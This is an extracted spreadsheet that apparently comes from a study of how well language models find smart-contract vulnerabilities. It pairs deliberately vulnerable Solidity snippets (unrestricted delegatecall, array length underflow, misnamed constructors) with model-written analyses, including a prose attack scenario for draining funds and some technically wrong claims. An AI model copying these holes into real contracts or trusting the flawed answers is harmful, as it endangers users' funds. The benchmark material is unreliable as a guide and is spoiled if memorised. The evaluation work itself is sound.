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 tests summary" sheetId="1" r:id="rId4"/>
    <sheet state="visible" name="smart bugs access ctrl" sheetId="2" r:id="rId5"/>
    <sheet state="visible" name="smart bugs bad randomness" sheetId="3" r:id="rId6"/>
    <sheet state="visible" name="smart bugs denial of service" sheetId="4" r:id="rId7"/>
    <sheet state="visible" name="smart bugs reentrancy" sheetId="5" r:id="rId8"/>
    <sheet state="visible" name="smart bugs arithmetic" sheetId="6" r:id="rId9"/>
    <sheet state="visible" name="smary bugs front running" sheetId="7" r:id="rId10"/>
    <sheet state="visible" name="smart bugs unchecked" sheetId="8" r:id="rId11"/>
    <sheet state="visible" name="smart bugs time manipulation" sheetId="9" r:id="rId12"/>
    <sheet state="visible" name="smart bugs short addresses" sheetId="10" r:id="rId13"/>
    <sheet state="visible" name="smart bugs others" sheetId="11" r:id="rId14"/>
  </sheets>
  <definedNames/>
  <calcPr/>
</workbook>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1000" uniqueCount="684">
  <si>
    <t>Vulnerability type</t>
  </si>
  <si>
    <t>CAQ Prompt</t>
  </si>
  <si>
    <t>CWE prompt</t>
  </si>
  <si>
    <t>ground truth</t>
  </si>
  <si>
    <t>full contracts</t>
  </si>
  <si>
    <t>CCL</t>
  </si>
  <si>
    <t xml:space="preserve">full contract false positive </t>
  </si>
  <si>
    <t xml:space="preserve">CCL false positive </t>
  </si>
  <si>
    <t>access control</t>
  </si>
  <si>
    <t>bad randomness</t>
  </si>
  <si>
    <t>denial of service</t>
  </si>
  <si>
    <t>reentrancy</t>
  </si>
  <si>
    <t>arithmetic</t>
  </si>
  <si>
    <t>front running</t>
  </si>
  <si>
    <t>uncheked</t>
  </si>
  <si>
    <t>Time manipulation</t>
  </si>
  <si>
    <t>short address</t>
  </si>
  <si>
    <t>others</t>
  </si>
  <si>
    <t>Total</t>
  </si>
  <si>
    <t>Detection rate</t>
  </si>
  <si>
    <t>Sensitivity</t>
  </si>
  <si>
    <t>F1 -score</t>
  </si>
  <si>
    <t>precision</t>
  </si>
  <si>
    <t>Filename</t>
  </si>
  <si>
    <t>code segment</t>
  </si>
  <si>
    <t>full contracts answer</t>
  </si>
  <si>
    <t>CCL contracts answer</t>
  </si>
  <si>
    <t>full contract false positive</t>
  </si>
  <si>
    <t>full contract answer</t>
  </si>
  <si>
    <t>CCL false positive</t>
  </si>
  <si>
    <t>dataset/access_control/FibonacciBalance.sol</t>
  </si>
  <si>
    <t xml:space="preserve">    function withdraw() {
        withdrawalCounter += 1;
        require(fibonacciLibrary.delegatecall(fibSig, withdrawalCounter));
        msg.sender.transfer(calculatedFibNumber * 1 ether);
    }
    function() public {
        require(fibonacciLibrary.delegatecall(msg.data));
    }
}</t>
  </si>
  <si>
    <t>Alright, I'll begin by reading and analyzing the provided Solidity code.
After analyzing the provided Solidity code, here's what I've found:
### Code Overview:
The code consists of two contracts:
1. `FibonacciBalance`:
   - Keeps track of Fibonacci numbers and allows users to withdraw Ether based on the Fibonacci sequence.
   - Uses the `FibonacciLib` contract to calculate Fibonacci numbers.
   - Contains a fallback function that delegates calls to the `FibonacciLib` contract.
2. `FibonacciLib`:
   - Contains functions to modify the starting Fibonacci number and to calculate the Fibonacci sequence.
### Vulnerability Analysis:
1. **Is there any vulnerabilities?**  
   Yes.
2. **how this vulnerability can be exploited :**
   - The `FibonacciBalance` contract uses the `delegatecall` method when interacting with the `FibonacciLib` contract. The use of `delegatecall` is inherently risky because it allows the called contract (in this case `FibonacciLib`) to modify the storage of the calling contract (`FibonacciBalance`). 
   - Specifically, the fallback function in `FibonacciBalance` allows any user to call any function from the `FibonacciLib` contract using `delegatecall`. This can lead to unintended storage changes in the `FibonacciBalance` contract.
   - The recursive implementation of the `fibonacci` function in `FibonacciLib` can lead to high gas consumption, potentially causing out-of-gas errors.
3. **The business impact of these vulnerabilities in one sentence:** 
   - The misuse of `delegatecall` leads to potential unauthorized changes in contract storage, and the recursive Fibonacci calculation can result in high gas costs.
4. **The potential solutions of these vulnerabilities:**
   - Avoid using `delegatecall` unless absolutely necessary. If you must use it, ensure that the called contract cannot unintentionally modify the storage of the calling contract.
   - Limit the functionality of the fallback function to reduce the risk associated with `delegatecall`.
   - Implement the Fibonacci calculation using an iterative approach instead of a recursive one to reduce gas consumption. 
Now, let's further demonstrate the vulnerability using the provided code.
To further demonstrate the vulnerability with `delegatecall`, let's explore a potential attack scenario:
### Attack Scenario:
Imagine an attacker creates a malicious library contract that has the same function signatures as `FibonacciLib`, but with different logic. If the attacker can somehow convince or manipulate the owner of the `FibonacciBalance` contract to set the `fibonacciLibrary` address to the address of this malicious contract, they can then exploit the `delegatecall` vulnerability to change the storage of the `FibonacciBalance` contract.
For instance, the malicious contract could be designed to always set the `calculatedFibNumber` to a very high value when the `setFibonacci` function is called, enabling the attacker to drain all the Ether from the `FibonacciBalance` contract.
### Proof of Concept:
1. Attacker deploys a malicious library contract that mimics `FibonacciLib` but with altered logic.
2. Attacker convinces/manipulates the owner to change the `fibonacciLibrary` address in `FibonacciBalance` to point to the malicious library.
3. Attacker interacts with the `FibonacciBalance` contract, triggering the malicious library's logic via `delegatecall`.
4. As a result, the `calculatedFibNumber` in `FibonacciBalance` gets set to an arbitrary high value.
5. Attacker calls the `withdraw` function and drains all the Ether from the `FibonacciBalance` contract.
This vulnerability demonstrates the dangers of using `delegatecall` without proper safeguards, especially when combined with external, updatable contract references. It's crucial to ensure that contracts using `delegatecall` are tightly controlled and not open to manipulation.</t>
  </si>
  <si>
    <t>1. Is there any vulnerabilities: Yes.
2. The line(s) with vulnerabilities: `require(fibonacciLibrary.delegatecall(msg.data));
require(fibonacciLibrary.delegatecall(fibSig, withdrawalCounter));`
3. The type of vulnerabilities of the code in one sentence: The vulnerability is related to the lack of access control and potentially reentrancy. The `delegatecall` function does not provide any restrictions on who can call it and what data they can provide (`msg.data`). This can lead to an unauthorized function being called within the `fibonacciLibrary` or even arbitrary code execution if the `msg.data` can be crafted in a certain way. Furthermore, since `delegatecall` is used, the state of the original contract can be changed by the called code, potentially leading to reentrancy attacks if not handled properly.
4. The potential solutions to these vulnerabilities:
   - Implement access control mechanisms: Only allow certain addresses (e.g., the contract owner) to call this function. This can be done using Solidity's `msg.sender` to check the caller's address and `require` to enforce the access control.
   - Validate `msg.data`: If possible, validate `msg.data` before passing it to `delegatecall` to ensure that only valid functions within `fibonacciLibrary` can be called.
   - Use `call` instead of `delegatecall`: If the state of the original contract does not need to be changed by the called code, using `call` can provide more isolation and prevent potential reentrancy attacks.
   - Reentrancy guard: If `delegatecall` must be used, consider implementing a reentrancy guard to prevent reentrancy attacks. This usually involves a state variable that tracks whether the contract is currently executing a function, and if so, any calls to that function will fail.
Please note that Solidity is a complex language and the provided code is only a small part of what would be a full contract, so there may be other vulnerabilities or mitigations not visible in this snippet.</t>
  </si>
  <si>
    <t>Let me first read and analyze the provided Solidity code.
Based on the provided Solidity code, let's analyze the potential access control vulnerabilities:
1. **Is there any access_control vulnerabilities?** 
Yes.
2. **Explain in details how this vulnerability can be exploited:** 
There are two main vulnerabilities related to access control:
   - The `withdraw()` function in the `FibonacciBalance` contract allows any user to withdraw funds based on the current `calculatedFibNumber` without any restrictions on who can call it or how often it can be called. This means that if someone is aware of this function and its behavior, they can drain the contract's balance.
   - The fallback function (`function() public`) in the `FibonacciBalance` contract uses `delegatecall` to the `fibonacciLibrary` with the given `msg.data`. This means that any function from the `FibonacciLib` library can be executed through this contract without any restrictions. An attacker can manipulate the `calculatedFibNumber` or `start` variable in the library, which can impact the behavior of the `FibonacciBalance` contract.
3. **The business impact of this vulnerabilities in one sentence:** 
The `withdraw()` function leads to potential loss of funds, and the unrestricted `delegatecall` in the fallback function allows manipulation of contract state.
4. **The potential solutions of this vulnerabilities:**
   - For the `withdraw()` function:
     * Add a restriction on who can call the function. For example, only allow the contract owner to call it.
     * Implement a limit on the number of times the function can be called or set a cooldown period between withdrawals.
   - For the fallback function:
     * Avoid using `delegatecall` in the fallback function without proper checks and validations. If you need to allow interactions with the `FibonacciLib` library, expose specific functions in the `FibonacciBalance` contract that interact with the library in a controlled manner, rather than allowing arbitrary calls through the fallback function.</t>
  </si>
  <si>
    <t>1. Is there any access control vulnerabilities? 
**Yes**
2. Explain in details how this vulnerability can be exploited:
The vulnerabilities in the provided code are related to the use of the `delegatecall` function and the missing access control on the fallback function.
- The `withdraw()` function uses `delegatecall` to an external library to calculate a Fibonacci number based on the `withdrawalCounter`. If an attacker can manipulate the `fibonacciLibrary` address or the logic inside that library, they can manipulate the outcome of the `delegatecall` and potentially the amount of Ether to be withdrawn.
- The fallback function also uses `delegatecall` with `msg.data`, which means it will execute any function from the `fibonacciLibrary` that matches the provided data. An attacker can potentially exploit this to call unintended functions or change the state of the contract if they know the structure of the `fibonacciLibrary`.
3. The business impact of this vulnerabilities in one sentence: 
Improper use of `delegatecall` leads to potential manipulation of contract logic and unauthorized fund withdrawal.
4. The potential solutions of this vulnerabilities:
- **Add Access Control:** Limit the access to the `withdraw()` function and the fallback function to only authorized addresses or roles. This can be done by using modifiers like `onlyOwner` or other similar constructs.
- **Be Cautious with `delegatecall`:** If you have to use `delegatecall`, ensure that the external library you're delegating the call to is trustable and immutable. This could mean deploying the library as a separate contract and hardcoding its address into your main contract.
- **Limit Fallback Functionality:** Restrict the functionality of the fallback function or remove it if it's not necessary. If you need a fallback, don't allow it to execute arbitrary functions using `delegatecall`.
- **Auditing and Testing:** Always get your smart contracts audited by professionals and do thorough testing, especially when using advanced features of the Ethereum platform like `delegatecall`.</t>
  </si>
  <si>
    <t>dataset/access_control/arbitrary_location_write_simple.sol</t>
  </si>
  <si>
    <t xml:space="preserve">     function PopBonusCode() public {
         require(0 &lt;= bonusCodes.length); 
         bonusCodes.length--; 
     }</t>
  </si>
  <si>
    <t>Alright, let me first review the code you provided to analyze it for vulnerabilities.
1. Is there any vulnerabilities? 
**Yes.**
2. Proof of concept of this vulnerabilities:
   - The function `PopBonusCode` contains an underflow vulnerability. Specifically, the line `require(0 &lt;= bonusCodes.length);` does not prevent the length from going negative because `bonusCodes.length` is of type `uint`, which cannot be negative. When `bonusCodes.length--` is called on an empty array, it will wrap around and set the length to a very large number, which can lead to unexpected behavior.
   - The function `UpdateBonusCodeAt` allows any user to modify any bonus code without any restrictions.
3. The business impact of this vulnerabilities in one sentence:
   - The underflow in `PopBonusCode` function leads to unexpected array behavior and potential exposure of uninitialized memory.
   - The unrestricted access in `UpdateBonusCodeAt` function leads to unauthorized modification of bonus codes.
4. The potential solutions of this vulnerabilities:
   - For the underflow vulnerability:
     * Change the require statement in the `PopBonusCode` function to `require(bonusCodes.length &gt; 0);` to ensure that the array is not empty before decrementing.
   - For the unrestricted access vulnerability:
     * Add an ownership check or an appropriate authorization mechanism in the `UpdateBonusCodeAt` function to ensure only authorized users can modify the bonus codes.</t>
  </si>
  <si>
    <t>1. Is there any vulnerabilities? Yes.
2. The line(s) with vulnerabilities: `function PopBonusCode() public {...}`
3. The code has a potential access control vulnerability, specifically unprotected function vulnerability, as the function `PopBonusCode()` is marked as `public`.Specific analysis on how these vulnerabilities form: In Solidity, functions are public by default. This means that they can be called from any other contract or externally by any account. Here, the `PopBonusCode()` function, being public, can be called by any account on the Ethereum network. If `bonusCodes` array is intended to be manipulated only by certain privileged accounts (e.g., the contract owner or a group of trusted accounts), then this code is vulnerable. Any malicious actor could call this function to tamper with the `bonusCodes` array, thereby leading to unintended consequences.
4. The potential solutions to these vulnerabilities: To mitigate this vulnerability, the function should be protected by some form of access control mechanism. In Solidity, this could be achieved by implementing the `onlyOwner` modifier if only the owner of the contract should be allowed to call this function. 
An example implementation would be:
```solidity
modifier onlyOwner {
    require(msg.sender == owner, "Caller is not the owner");
    _;
}
function PopBonusCode() public onlyOwner {
    require(0 &lt;= bonusCodes.length);
    bonusCodes.length--;
}
```
In this code, `onlyOwner` is a modifier that checks if the `msg.sender` (the address that is currently executing the function) is equal to the `owner` (a state variable that is typically set upon contract creation to the address that deployed the contract). If it's not, the function execution will stop and all changes will be reverted. If it is, the function execution will continue. 
Please note that the specific implementation of access control could vary based on the needs of the contract. For example, it might be necessary to allow a group of administrators rather than a single owner to call this function. In that case, a more complex access control mechanism might be needed.</t>
  </si>
  <si>
    <t>Let's start by reading and analyzing the provided Solidity code.
From the provided Solidity code, we have a contract named `Wallet` with the following key points:
1. `bonusCodes`: A private dynamic array of unsigned integers.
2. `owner`: A private variable that stores the address of the contract owner, which is set to the address that deploys the contract (`msg.sender`) in the constructor.
3. A fallback function that allows the contract to accept Ether.
4. `PushBonusCode(uint c)`: A function that allows anyone to add a bonus code to the `bonusCodes` array.
5. `PopBonusCode()`: A function that allows anyone to remove a bonus code from the `bonusCodes` array.
6. `UpdateBonusCodeAt(uint idx, uint c)`: A function that allows anyone to update the bonus code at a specified index in the `bonusCodes` array.
7. `Destroy()`: A function that only the contract owner can call to self-destruct the contract.
With this understanding, let's address the format you provided:
1. **Is there any access control vulnerabilities?**
Answer: Yes.
2. **Proof of concept of this vulnerability:**
- The `PopBonusCode` function does not correctly handle underflows. If the `bonusCodes` array is empty and someone calls the `PopBonusCode` function, the length of the `bonusCodes` array will underflow and become a very large number. This is due to the line `require(0 &lt;= bonusCodes.length);`, which does not prevent the function from being called when `bonusCodes.length` is 0.
- The `UpdateBonusCodeAt` function allows anyone to update any bonus code at a specified index without any restrictions.
3. **The business impact of this vulnerability in one sentence:**
- The `PopBonusCode` function can be abused to make the `bonusCodes` array length extremely large, causing other functions to malfunction, and potentially incurring high gas costs. The misuse of `UpdateBonusCodeAt` function leads to unauthorized modification of bonus codes.
4. **The potential solutions of this vulnerability:**
- For the `PopBonusCode` function, the condition should be modified to `require(bonusCodes.length &gt; 0);` to prevent underflows.
- For the `UpdateBonusCodeAt` function, access control should be implemented to ensure only authorized users or the owner can update bonus codes.
Let's detail these findings in the format you provided.
1. **Is there any access control vulnerabilities?**
   Yes.
2. **how this vulnerability can be exploited :**
   - In the `PopBonusCode` function:
     - If the `bonusCodes` array is empty (`bonusCodes.length == 0`), and someone calls the `PopBonusCode` function, the length of the `bonusCodes` array will underflow and become a very large number because of the incorrect condition `require(0 &lt;= bonusCodes.length);`.
   - In the `UpdateBonusCodeAt` function:
     - Anyone can update any bonus code at a specified index without any restrictions.
3. **The business impact of these vulnerabilities in one sentence:**
   The flawed `PopBonusCode` function can cause the `bonusCodes` array length to become extremely large, leading to potential malfunction and high gas costs, while the `UpdateBonusCodeAt` function allows unauthorized modification of bonus codes.
4. **The potential solutions of these vulnerabilities:**
   - For the `PopBonusCode` function:
     - Modify the condition to `require(bonusCodes.length &gt; 0);` to prevent underflows.
   - For the `UpdateBonusCodeAt` function:
     - Implement access control to ensure only authorized users or the owner can update bonus codes.</t>
  </si>
  <si>
    <t>1. Is there any access control vulnerabilities? 
**Yes**
2. Explain in details how this vulnerability can be exploited:
The `PopBonusCode` function allows any external user (address) to call it and decrease the length of the `bonusCodes` array. There's no restriction on who can call this function.
3. The business impact of this vulnerabilities in one sentence:
Any unauthorized user can tamper with the `bonusCodes` array, leading to potential data loss or unintended behavior.
4. The potential solutions of this vulnerabilities:
- Add an access control modifier (e.g., `onlyOwner` or any other role-based access control) to the `PopBonusCode` function to ensure only authorized users can call it.
- Implement a better mechanism for managing the `bonusCodes` array that doesn't rely on manually adjusting its length. This could involve using a mapping or a more structured data management process.</t>
  </si>
  <si>
    <t>dataset/access_control/incorrect_constructor_name1.sol</t>
  </si>
  <si>
    <t xml:space="preserve">    function IamMissing()
        public
    {
        owner = msg.sender;
    }
</t>
  </si>
  <si>
    <t>Let's first read and understand the provided Solidity code.
1. **Is there any vulnerabilities?** 
Yes.
2. **Proof of concept of this vulnerability:** 
The contract defines a function named `IamMissing()` which seems to be intended as a constructor, given its behavior of setting the owner. However, in Solidity, the constructor should have the same name as the contract or, in more recent versions, be explicitly declared using the `constructor` keyword. Since `IamMissing` is not a valid constructor for the contract named `Missing`, it can be called by anyone after the contract is deployed, allowing them to change the owner at any time.
3. **The business impact of this vulnerability in one sentence:** 
The `IamMissing` function allows arbitrary users to seize ownership, leading to unauthorized withdrawals of funds.
4. **The potential solutions of this vulnerability:**
   - Rename the `IamMissing` function to `constructor` and ensure you're using an appropriate version of the Solidity compiler which supports this syntax.
   - Add a check within the `IamMissing` function to ensure it can only be executed once, so the owner can't be changed after initial assignment. However, using the proper constructor syntax is more idiomatic and recommended.
   - Upgrade the Solidity compiler version to a more recent one and adhere to the latest best practices.</t>
  </si>
  <si>
    <t>1. Is there any vulnerabilities? Yes.
2. The line(s) with vulnerabilities: `owner = msg.sender;`
3. The type of vulnerabilities of the code in one sentence: The code has an access control vulnerability where any user can take ownership of the contract. The function `IamMissing` is public, which means that any user can call it. When called, it sets the `owner` of the contract to `msg.sender`, which is the address of the entity (user or contract) that called the function. This implies that anyone who calls this function can become the owner of the contract, potentially gaining control over sensitive operations that should be restricted to the rightful owner.
4. The potential solutions to these vulnerabilities: 
   - The function should be modified to restrict who can call it. Typically, this is done by adding a modifier such as `onlyOwner` to the function, which would only allow the current owner to change the ownership.
   - The contract could also implement a more sophisticated role-based access control (RBAC) system, which could provide more granular control over who can perform certain actions.
   - Finally, a multi-signature scheme could be employed for critical actions like changing ownership, where multiple accounts would have to approve the change before it is executed.</t>
  </si>
  <si>
    <t>Alright, I will review the provided Solidity code to determine if there are any access control vulnerabilities. Let's begin by examining the contents of the uploaded file.
1. Is there any access control vulnerabilities?
**Answer: Yes.**
2. Explain in details how this vulnerability can be exploited:
The provided Solidity code has a function named `IamMissing()` which is intended to act as a constructor to set the `owner` variable. However, Solidity constructors for versions `^0.4.22` and above should have the same name as the contract. In this case, the constructor should be named `Missing` (same as the contract name) and not `IamMissing`. This means `IamMissing` is a regular public function, not a constructor. Any external actor can call this function to set themselves as the owner, even if the contract is already deployed and the owner is initially set.
3. The business impact of this vulnerabilities in one sentence:
The misuse of the constructor function leads to unauthorized ownership takeover.
4. The potential solutions of this vulnerabilities:
- Rename the function `IamMissing` to `Missing` to make it a valid constructor.
- Upgrade the Solidity compiler version to `^0.4.22` or above and use the `constructor` keyword instead of naming the function the same as the contract. This will prevent such naming mistakes in the future.</t>
  </si>
  <si>
    <t>1. Is there any access control vulnerabilities? 
**Yes.**
2. Proof of concept of this vulnerability:
Anyone can call the `IamMissing` function and set themselves as the `owner` of the contract. This is because there is no restriction on who can call this function.
3. The business impact of this vulnerability in one sentence:
Unrestricted access to the `IamMissing` function leads to potential takeover of the contract ownership.
4. The potential solutions of this vulnerability:
- Restrict access to the `IamMissing` function by using a modifier that ensures only the current owner or a specific authorized address can call it.
- Initialize the `owner` variable in the constructor of the contract so that it can only be set once when the contract is deployed.
- If the intention is to allow transfer of ownership, create a dedicated function for it that requires both the current owner's authorization and an acceptance from the new owner.</t>
  </si>
  <si>
    <t>dataset/access_control/incorrect_constructor_name2.sol</t>
  </si>
  <si>
    <t xml:space="preserve">function missing()
        public
    {
        owner = msg.sender;
    }
</t>
  </si>
  <si>
    <t>I'll start by reading and analyzing the provided Solidity code.
1. Are there any vulnerabilities? 
**Yes.**
2. how this vulnerability can be exploited :
The contract seems to be suffering from the "Incorrect Constructor Name" vulnerability. Instead of the constructor being named `constructor()`, it is named `missing()`, which means that it's just a regular public function that anyone can call, not just once, but multiple times.
3. The business impact of these vulnerabilities in one sentence:
The `missing()` function leads to a change in contract ownership.
4. The potential solutions for these vulnerabilities:
- Rename the `missing()` function to `constructor()` to ensure it only runs once when the contract is deployed.
- If the contract is already deployed, you might need to deploy a new version with the correct constructor name and migrate any necessary data or funds.</t>
  </si>
  <si>
    <t>1. Is there any vulnerabilities? 
**Yes.**
2. Explain in details how this vulnerability can be exploited:
The function `missing` allows any user to change the `owner` address to their own. There are no access controls in place to prevent unauthorized users from calling this function and assuming ownership of the contract.
3. The business impact of this vulnerabilities in one sentence:
The `missing` function leads to unauthorized takeover of contract ownership.
4. The potential solutions of this vulnerabilities:
- Add a modifier (e.g., `onlyOwner`) to ensure that only the current owner of the contract can execute the `missing` function.
- Remove the function if it's not necessary or its purpose is not clear.
- If the function is meant to transfer ownership, consider renaming it to something more descriptive (e.g., `transferOwnership`) and add the necessary access controls.</t>
  </si>
  <si>
    <t>Alright, let's start by reading and understanding the provided Solidity code.
I've analyzed the provided Solidity code. Here's my assessment:
1. **Are there any access control vulnerabilities?**
   Yes.
2. **how this vulnerability can be exploited :**
   The contract uses a function named `missing()` which seems to be intended as a constructor. However, in Solidity, constructors should have the `constructor` keyword. Since `missing()` is not a constructor, any external account can call it and set themselves as the owner, which is a critical vulnerability.
3. **The business impact of these vulnerabilities in one sentence:**
   The `missing()` function allows any external user to become the owner, thereby potentially withdrawing all the funds.
4. **The potential solutions to these vulnerabilities:**
   - Change the `missing()` function to use the `constructor` keyword to ensure it can only be called once when the contract is deployed.
   - Ensure that the contract is reviewed and tested for security issues before being deployed on the mainnet."</t>
  </si>
  <si>
    <t>1. Are there any access control vulnerabilities? 
**Yes.**
2. how this vulnerability can be exploited :
The function `missing` allows anyone to change the `owner` address to their own address (`msg.sender`). There is no restriction or condition to check if the caller is the original owner or has the right permissions.
3. The business impact of these vulnerabilities in one sentence:
The `missing` function leads to unauthorized users taking over ownership of the contract.
4. The potential solutions of these vulnerabilities:
   - Add a modifier to the function that checks if the caller is the original owner before allowing changes.
   - Remove or modify the function if it is not necessary for the contract's functionality. If its purpose is to change the owner, then it should have strict access controls in place.
   - Add event logs to track when ownership changes. This allows for transparency and easier detection of any unauthorized changes.</t>
  </si>
  <si>
    <t>dataset/access_control/incorrect_constructor_name3.sol</t>
  </si>
  <si>
    <t xml:space="preserve">    function Constructor()
        public
    {
        owner = msg.sender;
    }</t>
  </si>
  <si>
    <t>I will begin by reviewing the provided Solidity code to identify any potential vulnerabilities.
1. Are there any vulnerabilities? 
**Yes.**
2. how this vulnerability can be exploited :
- The contract has used a function named `Constructor` instead of the correct constructor syntax for the given Solidity version (`0.4.24`). The correct constructor syntax for this version should be `function Missing()`. Because of this, the `Constructor` function will not be automatically executed upon contract deployment, leaving the `owner` variable uninitialized.
3. The business impact of these vulnerabilities in one sentence: 
- The incorrect constructor function leads to an uninitialized owner, making the `onlyowner` modifier ineffective.
4. The potential solutions for these vulnerabilities:
- Rename the `Constructor` function to the contract name (`Missing`) to make it the actual constructor.
- Upgrade to a more recent version of Solidity and use the `constructor` keyword explicitly.
- Always initialize state variables to prevent potential vulnerabilities related to uninitialized storage.</t>
  </si>
  <si>
    <t>1. Are there any vulnerabilities? 
**Yes.**
2. how this vulnerability can be exploited :
The function name "Constructor" is meant to be a constructor for the smart contract. However, in Solidity, the correct way to define a constructor is with the `constructor` keyword, not a function named "Constructor". This function can be called multiple times by any user, potentially changing the owner of the contract after deployment.
3. The business impact of these vulnerabilities in one sentence:
**The incorrect constructor function leads to potential unauthorized change of contract ownership.**
4. The potential solutions of these vulnerabilities:
- Rename the "Constructor" function to use the `constructor` keyword, and ensure it has the correct visibility (e.g., `public` or `internal`).
- Implement a mechanism to ensure that the contract owner can only be set once, or add additional checks/controls if the owner needs to be changed in the future.</t>
  </si>
  <si>
    <t>Let's start by examining the provided Solidity code to determine if there are any access control vulnerabilities.
1. Are there any access control vulnerabilities? 
**Yes.**
2. how this vulnerability can be exploited :
The contract uses a function named `Constructor` to initialize the owner variable. In Solidity, constructors are special functions that only run once when the contract is deployed. The correct way to define a constructor is using the `constructor` keyword without any function name. Since the provided code uses `function Constructor()`, it's not treated as a constructor, but as a regular function that can be called multiple times.
3. The business impact of these vulnerabilities in one sentence:
The incorrect use of the constructor function leads to potential ownership takeovers, enabling unauthorized withdrawals.
4. The potential solutions to these vulnerabilities:
- Rename the `Constructor` function to the correct constructor format by using the `constructor` keyword.
- Upgrade the Solidity version to a more recent one where constructors must be declared with the `constructor` keyword to prevent such mistakes.</t>
  </si>
  <si>
    <t>1. Are there any access control vulnerabilities? 
**Yes**.
2. how this vulnerability can be exploited :
The function `Constructor()` is named as if it were a constructor for a contract in older versions of Solidity (pre-0.4.22). However, in newer versions of Solidity (0.4.22 and later), constructors should be defined using the `constructor` keyword. If this contract was written for a newer version of Solidity, this means that `Constructor()` is just a regular public function that anyone can call, potentially allowing them to change the owner of the contract.
3. The business impact of these vulnerabilities in one sentence:
The `Constructor()` function leads to unauthorized change of contract ownership.
4. The potential solutions of these vulnerabilities:
- Change the visibility of the function to `internal` or `private` if you don't want it to be accessed externally.
- If this is supposed to be a constructor, rename the function to use the `constructor` keyword and remove the `public` visibility specifier, as constructors are inherently public.
- Implement proper access controls like ensuring that the function can only be called once or by certain addresses if needed.</t>
  </si>
  <si>
    <t>dataset/access_control/mapping_write.sol</t>
  </si>
  <si>
    <t xml:space="preserve">     function set(uint256 key, uint256 value) public {
         if (map.length &lt;= key) {
             map.length = key + 1;
         }
         map[key] = value;
     }</t>
  </si>
  <si>
    <t>Let's start by reading and examining the contents of the provided Solidity code.
Here's a brief overview of the Solidity code provided:
- There's a contract called `Map`.
- It has an `owner` address and an array called `map`.
- The contract contains three functions:
  1. `set(uint256 key, uint256 value)`: This function allows setting a value at a given key in the `map` array.
  2. `get(uint256 key)`: This function returns the value at the given key.
  3. `withdraw()`: This function allows the contract owner to withdraw the contract's balance.
Now, let's analyze the code for vulnerabilities.
1. Are there any vulnerabilities?
Let's go step-by-step.
1. Are there any vulnerabilities?
**Yes.**
2. how this vulnerability can be exploited :
- In the `set(uint256 key, uint256 value)` function:
    - The code is attempting to resize the `map` array if the provided `key` is larger than the current length of the array. The line `map.length = key + 1;` can increase the length of the array.
    - This can lead to two vulnerabilities:
        1. An attacker can purposely provide an extremely large `key` value to force the contract to consume a lot of gas when trying to resize the array, potentially causing a Denial of Service (DoS).
        2. If a user accidentally sets a key that's much larger than the current length, it will unnecessarily increase storage costs.
3. The business impact of these vulnerabilities in one sentence:
- The `set` function can be abused to exhaust gas and increase storage costs, leading to financial losses and potential DoS.
4. The potential solutions of these vulnerabilities:
- Introduce a maximum limit for the `key` value to prevent setting values at extremely high indexes. This will protect the contract from unintended resizing and high storage costs.
- Consider using a mapping instead of an array if the intent is to have key-value pairs. This will efficiently handle the storage without the need to resize arrays. The syntax for using a mapping in Solidity is `mapping(dataType =&gt; dataType) mappingName;`. For instance, in this context, it could be `mapping(uint256 =&gt; uint256) map;`.
- Always have appropriate access controls for functions that can potentially change the state of the contract or have financial implications. In this code, the `set` function is public, meaning anyone can call it. If it's intended for restricted use, consider adding modifiers like `onlyOwner` to limit its access.</t>
  </si>
  <si>
    <t>1. The aim of the code: The provided Solidity code snippet is a function that sets a particular key-value pair in a mapping called `map`. If the key is not yet present in the mapping (or is beyond the current length of the mapping), the length of the map is increased to accommodate the new key-value pair.
2. Is there any access control vulnerabilities? Yes
3. The line(s) with vulnerabilities: The entire function, specifically the lack of any access controls.
4. The type of vulnerabilities of the code in one sentence: The vulnerability lies in the absence of any access control mechanism, thus allowing any actor to call this function and modify the `map` data structure.
5. Specific analysis on how these vulnerabilities form: Access control is a security technique that regulates who or what can view or use resources in a computing environment. In the case of this Solidity function, it's written such that any entity can execute it. This means that an arbitrary user can call this function to manipulate the state of the `map` without any restrictions. In the context of smart contracts on the Ethereum blockchain, this poses a significant security risk as it could lead to unauthorized modifications of contract state, and potential loss or misuse of the funds or data stored in the contract.
6. The potential solutions for these vulnerabilities: One common solution to this kind of vulnerability is to implement a modifier that only allows a specific Ethereum address (typically the address that deployed the contract, known as the owner) to call this function. Here's a simple example of how this could be implemented:
```solidity
address private owner;
constructor() public {
    owner = msg.sender;
}
modifier onlyOwner() {
    require(msg.sender == owner, "Caller is not owner");
    _;
}
function set(uint256 key, uint256 value) public onlyOwner {
    if (map.length &lt;= key) {
        map.length = key + 1;
    }
    map[key] = value;
}
```
In this improved version of the code, the `set` function can only be called by the address that initially deployed the contract (i.e., the owner). The `onlyOwner` modifier is used to restrict access to the function, and it does this by requiring that the sender of the transaction (`msg.sender`) is the same as the owner of the contract. If this condition is not met, the function call is reverted and the state of the contract remains unchanged.</t>
  </si>
  <si>
    <t>Alright, let's first take a look at the contents of the provided Solidity code file.
Here's a brief summary of the Solidity code:
```solidity
pragma solidity ^0.4.24;
contract Map {
    address public owner;
    uint256[] map;
    function set(uint256 key, uint256 value) public {
        if (map.length &lt;= key) {
            map.length = key + 1;
        }
        map[key] = value;
    }
    function get(uint256 key) public view returns (uint256) {
        return map[key];
    }
    function withdraw() public {
        require(msg.sender == owner);
        msg.sender.transfer(address(this).balance);
    }
}
```
Based on this code, let's analyze it for potential vulnerabilities:
1. Are there any access control vulnerabilities? 
**Response**: Yes.
2. how this vulnerability can be exploited :
- The contract does not initialize the `owner` variable in a constructor, so the `owner` variable remains `0x0` (the zero address). As a result, anyone can call the `withdraw()` function, bypassing the `require(msg.sender == owner)` check.
3. The business impact of these vulnerabilities in one sentence:
- The uninitialized `owner` variable allows any user to withdraw funds from the contract.
4. The potential solutions of these vulnerabilities:
- Initialize the `owner` variable in the contract's constructor to ensure it's set to the contract deployer's address.
- Always ensure that critical variables, especially those related to access control, are properly initialized.
- Consider adding a `onlyOwner` modifier for functions that should be restricted to the owner's access.</t>
  </si>
  <si>
    <t>1. Are there any access control vulnerabilities?
**Yes.**
2. how this vulnerability can be exploited :
The function `set` allows any external account to call it and modify the values in the `map` at any index. There is no restriction or access control mechanism in place to prevent unauthorized modifications.
3. The business impact of these vulnerabilities in one sentence:
**Unrestricted `set` function leads to potential unauthorized modifications to the `map` storage.**
4. The potential solutions of this vulnerabilities:
- Implement an access control mechanism, such as an "onlyOwner" modifier, to restrict the function to authorized users only.
